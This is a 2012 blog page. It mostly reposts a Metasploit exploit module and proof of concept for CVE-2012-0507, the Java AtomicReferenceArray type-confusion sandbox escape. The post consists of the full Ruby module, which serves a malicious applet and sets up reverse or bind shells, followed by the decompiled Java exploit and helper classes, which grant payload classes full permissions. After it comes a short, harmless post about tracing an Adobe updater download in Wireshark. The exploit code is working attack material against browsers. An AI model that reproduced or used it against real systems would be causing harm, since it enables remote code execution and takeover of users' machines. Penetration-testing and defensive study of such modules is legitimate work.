Saturday, April 14, 2012

JAVA CVE-2012-0507 Metasploit POC

Authors:
Jeroen Frijters @ sinn3r at metasploit dot com
Juan Vazquez @ egypt at metasploit dot com



 ##  
 # This file is part of the Metasploit Framework and may be subject to  
 # redistribution and commercial restrictions. Please see the Metasploit  
 # Framework web site for more information on licensing and terms of use.  
 #  http://metasploit.com/framework/  
 ##  
 require 'msf/core'  
 require 'rex'  
 class Metasploit3 < Msf::Exploit::Remote  
      Rank = ExcellentRanking  
      include Msf::Exploit::Remote::HttpServer::HTML  
      include Msf::Exploit::EXE  
      include Msf::Exploit::Remote::BrowserAutopwn  
      autopwn_info({ :javascript => false })  
      def initialize( info = {} )  
           super( update_info( info,  
                'Name'      => 'Java AtomicReferenceArray Type Violation Vulnerability',  
                'Description'  => %q{  
                          This module exploits a vulnerability due to the fact that  
                     AtomicReferenceArray uses the Unsafe class to store a reference in an  
                     array directly, which may violate type safety if not used properly.  
                     This allows a way to escape the JRE sandbox, and load additional classes  
                     in order to perform malicious operations.  
                },  
                'License'    => MSF_LICENSE,  
                'Author'     =>  
                     [  
                          'Jeroen Frijters', #Initial discovery according to his blog  
                          'sinn3r',     # metasploit module  
                          'juan vazquez',  # metasploit module  
                          'egypt'      # added support for older java versions  
                     ],  
                'References'   =>  
                     [  
                          ['CVE', '2012-0507'],  
                          ['OSVDB', '80724'],  
                          ['BID', '52161'],  
                          ['URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3'],  
                          ['URL', 'http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx'],  
                          ['URL', 'http://schierlm.users.sourceforge.net/TypeConfusion.html'],  
                          ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507']  
                     ],  
                'Platform'    => [ 'java', 'win', 'osx', 'linux', 'solaris' ],  
                'Payload'    => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },  
                'Targets'    =>  
                     [  
                          [ 'Generic (Java Payload)',  
                               {  
                                    'Platform' => ['java'],  
                                    'Arch' => ARCH_JAVA,  
                               }  
                          ],  
                          [ 'Windows x86 (Native Payload)',  
                               {  
                                    'Platform' => 'win',  
                                    'Arch' => ARCH_X86,  
                               }  
                          ],  
                          [ 'Mac OS X PPC (Native Payload)',  
                               {  
                                    'Platform' => 'osx',  
                                    'Arch' => ARCH_PPC,  
                               }  
                          ],  
                          [ 'Mac OS X x86 (Native Payload)',  
                               {  
                                    'Platform' => 'osx',  
                                    'Arch' => ARCH_X86,  
                               }  
                          ],  
                          [ 'Linux x86 (Native Payload)',  
                               {  
                                    'Platform' => 'linux',  
                                    'Arch' => ARCH_X86,  
                               }  
                          ],  
                     ],  
                'DefaultTarget' => 0,  
                'DisclosureDate' => 'Feb 14 2012'  
                ))  
      end  
      def exploit  
           # load the static jar file  
           path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-0507.jar" )  
           fd = File.open( path, "rb" )  
           @jar_data = fd.read(fd.stat.size)  
           fd.close  
           super  
      end  
      def on_request_uri( cli, request )  
           data = ""  
           host = ""  
           port = ""  
           peer = "#{cli.peerhost}:#{cli.peerport}"  
           if not request.uri.match(/\.jar$/i)  
                if not request.uri.match(/\/$/)  
                     send_redirect( cli, get_resource() + '/', '')  
                     return  
                end  
                print_status("#{peer} - Sending #{self.name}")  
                payload = regenerate_payload( cli )  
                if not payload  
                     print_error("#{peer} - Failed to generate the payload." )  
                     return  
                end  
                if target.name == 'Generic (Java Payload)'  
                     if datastore['LHOST']  
                          jar = payload.encoded  
                          host = datastore['LHOST']  
                          port = datastore['LPORT']  
                          vprint_status("Java reverse shell to #{host}:#{port} from #{peer}" )  
                     else  
                          port = datastore['LPORT']  
                          datastore['RHOST'] = cli.peerhost  
                          vprint_status( "Java bind shell on #{cli.peerhost}:#{port}..." )  
                     end  
                     if jar  
                          print_status( "Generated jar to drop (#{jar.length} bytes)." )  
                          jar = Rex::Text.to_hex( jar, prefix="" )  
                     else  
                          print_error("#{peer} - Failed to generate the executable." )  
                          return  
                     end  
                else  
                     # NOTE: The EXE mixin automagically handles detection of arch/platform  
                     data = generate_payload_exe  
                     if data  
                          print_status("#{peer} - Generated executable to drop (#{data.length} bytes)." )  
                          data = Rex::Text.to_hex( data, prefix="" )  
                     else  
                          print_error("#{peer} - Failed to generate the executable." )  
                          return  
                     end  
                end  
                send_response_html( cli, generate_html( data, jar, host, port ), { 'Content-Type' => 'text/html' } )  
                return  
           end  
           print_status( "#{peer} - sending jar..." )  
           send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } )  
           handler( cli )  
      end  
      def generate_html( data, jar, host, port )  
           jar_name = rand_text_alpha(rand(6)+3) + ".jar"  
           html = "<html><head></head>"  
           html += "<body>"  
           html += "<applet archive=\"#{jar_name}\" code=\"msf.x.Exploit.class\" width=\"1\" height=\"1\">"  
           html += "<param name=\"data\" value=\"#{data}\"/>" if data  
           html += "<param name=\"jar\" value=\"#{jar}\"/>" if jar  
           html += "<param name=\"lhost\" value=\"#{host}\"/>" if host  
           html += "<param name=\"lport\" value=\"#{port}\"/>" if port  
           html += "</applet></body></html>"  
           return html  
      end  
      def generate_jar()  
           return @jar_data  
      end  
 end  
Exploit
 package a;  
 import java.applet.Applet;  
 import java.io.ByteArrayInputStream;  
 import java.io.ObjectInputStream;  
 import java.util.concurrent.atomic.AtomicReferenceArray;  
 import a.*;  
 // Referenced classes of package a:  
 //                Help  
 public class Exploit extends Applet  
 {  
      public Exploit()  
      {  
      }  
      public static byte[] StringToBytes(String s)  
      {  
           byte abyte0[] = new byte[s.length() / 2];  
           for(int i = 0; i < s.length(); i += 2)  
                abyte0[i / 2] = (byte)((Character.digit(s.charAt(i), 16) << 4) + Character.digit(s.charAt(i + 1), 16));  
           return abyte0;  
      }  
      public void init()  
      {  
           try  
           {  
                String as[] = {  
                     "ACED0005757200135B4C6A6176612E6C616E672E4F62", "6A6563743B90CE589F1073296C020000787000000002", "757200095B4C612E48656C703BFE2C941188B6E5FF02", "000078700000000170737200306A6176612E7574696C", "2E636F6E63757272656E742E61746F6D69632E41746F", "6D69635265666572656E63654172726179A9D2DEA1BE", "65600C0200015B000561727261797400135B4C6A6176", "612F6C616E672F4F626A6563743B787071007E0003"   
                };  
                StringBuilder stringbuilder = new StringBuilder();  
                for(int i = 0; i < as.length; i++)  
                     stringbuilder.append(as[i]);  
                ObjectInputStream objectinputstream = new ObjectInputStream(new ByteArrayInputStream(StringToBytes(stringbuilder.toString())));  
                Object aobj[] = (Object[])(Object[])objectinputstream.readObject();  
                Help ahelp[] = (Help[])(Help[])aobj[0];  
                AtomicReferenceArray atomicreferencearray = (AtomicReferenceArray)aobj[1];  
                ClassLoader classloader = getClass().getClassLoader();  
                atomicreferencearray.set(0, classloader);  
                Help _tmp = ahelp[0];  
                String data = getParameter( "data" );  
                String jar  = getParameter( "jar" );  
                String lhost = getParameter( "lhost" );  
                String lport = getParameter( "lport" );       
                System.out.println("go go go");  
                Help.doWork(ahelp[0], this, data, jar, lhost, ( lport == null ? 4444 : Integer.parseInt( lport ) ));  
           }  
           catch(Exception exception) {   
                System.out.println(exception.getMessage());  
           }  
      }  
 }  
Helper
 package a;  
 import java.io.ByteArrayOutputStream;  
 import java.io.IOException;  
 import java.io.InputStream;  
 import java.io.ObjectInputStream;  
 import java.io.ObjectOutputStream;  
 import java.io.Serializable;  
 import java.net.URL;  
 import java.security.AllPermission;  
 import java.security.CodeSource;  
 import java.security.Permissions;  
 import java.security.ProtectionDomain;  
 import java.security.cert.Certificate;  
 import java.lang.reflect.Field;  
 public class Help extends ClassLoader implements Serializable{  
      public static void doWork(Help h, Exploit expl, String data, String jar, String lhost, int lport) {  
           String classNames[] = { "msf.x.PayloadX$StreamConnector", "msf.x.PayloadX" };  
           String classPaths[] = { "/msf/x/PayloadX$StreamConnector.class", "/msf/x/PayloadX.class" };  
           Class cls = null;  
           try  
           {  
                for( int index=0 ; index<classNames.length ; index++ )  
                {  
                     ByteArrayOutputStream bos = new ByteArrayOutputStream();  
                     byte[] buffer = new byte[8192];  
                     int length;  
                     // read in the class file from the jar  
                     InputStream is = expl.getClass().getResourceAsStream( classPaths[index] );  
                     // and write it out to the byte array stream  
                     while( ( length = is.read( buffer ) ) > 0 )  
                          bos.write( buffer, 0, length );  
                     // convert it to a simple byte array  
                     buffer = bos.toByteArray();  
                     URL url = new URL( "file:///" );  
                     Certificate[] certs = new Certificate[0];  
                     Permissions perm = new Permissions();  
                     perm.add( new AllPermission() );  
                     ProtectionDomain pd = new ProtectionDomain( new CodeSource( url, certs ), perm );  
                     cls = h.defineClass( classNames[index], buffer, 0, buffer.length, pd );  
                     Class class_cls = cls.getClass();   
                     System.out.println("The type of the object is: " + class_cls.getName());   
                }  
                // cls will end up being the PayloadX class  
                if( cls != null )  
                {  
                     // reflect into the PayloadX class to get these three fields  
                     Field payload_data = cls.getField( "data" );  
                     Field payload_jar  = cls.getField( "jar" );  
                     Field payload_lhost = cls.getField( "lhost" );  
                     Field payload_lport = cls.getField( "lport" );  
                     // instantiate the PayloadX object once so as we can set the native payload data  
                     Object obj = cls.newInstance();  
                     // set the native payload data, lhost and lport  
                     payload_data.set( obj, data );  
                     payload_jar.set( obj, jar );  
                     payload_lhost.set( obj, lhost );  
                     payload_lport.setInt( obj, lport );  
                     // instantiate a second PayloadX object to perform the actual payload   
                     obj = cls.newInstance();  
                }  
           }  
           catch( Exception e ) {  
                System.out.println(e.getMessage());  
           }            
      }  
 }  

CSI:NY Guide to xbox360 game hacking



Thursday, April 12, 2012

What the hell is downloading all that stuff under netsvcs?

I like to play online games, and just about nothing is as annoying as lag during those games. One thing that however does make it worse is lag caused by download that you can't identify. So I am playing a game on my free time, all of a sudden my ping times jump to 999ms. Naturally I look at my connections see that process with PID 428 is downloading something. Quick look in to task manager and found out that 428 is netsvcs. That then doesn't make things really much clearer as to what is the culprit of in downloading large amounts of data, in this case from 92.123.155.59. Which ripe shows as being owned by Akamai Technologies. This still doesn't make things any clearer as I don't remember, and can't find by quick search of anything on my computer by Akamai.

Step in wireshark, filter on ip and immediatly we see the following:
33378 739.213642 192.168.0.149 92.123.155.59 HTTP 335 GET /pub/adobe/reader/win/10.x/10.1.0/en_US/AdbeRdr1010_en_US.msi HTTP/1.1 

So yes pointless post most likely, I just wish companies that do use auto updaters would clearly show when they are downloading, and what. If apple had had a clearly labelled updater in task list I wouldn't have had to go thru all that just to find out that acrobat is downloading update. But in one respect it was good thing, now I do not have acrobat reader on my desktop computer anymore since it has been replaced by foxit reader.